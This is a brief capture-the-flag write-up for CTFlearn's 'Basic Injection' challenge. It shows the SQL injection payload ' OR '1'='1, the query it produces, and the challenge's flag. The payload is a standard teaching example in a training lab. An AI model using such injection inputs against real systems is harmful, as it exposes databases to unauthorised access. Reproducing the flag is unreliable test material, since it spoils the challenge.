Skip to main content

Basic Injection

See if you can leak the whole database using what you know about SQL Injections. link Don't know where to begin? Check out CTFlearn's SQL Injection Lab

The website takes user input and puts it in an SQL query.

1

We want our input to be such that the query's login is true.

' OR '1'='1

The input will cause the SQL query to look as follows:

SELECT * FROM webfour.webfour where name = '' OR '1'='1'

As the name field is blank and 1 is always equal to 1, the entire database is leaked.

2

Flag

CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}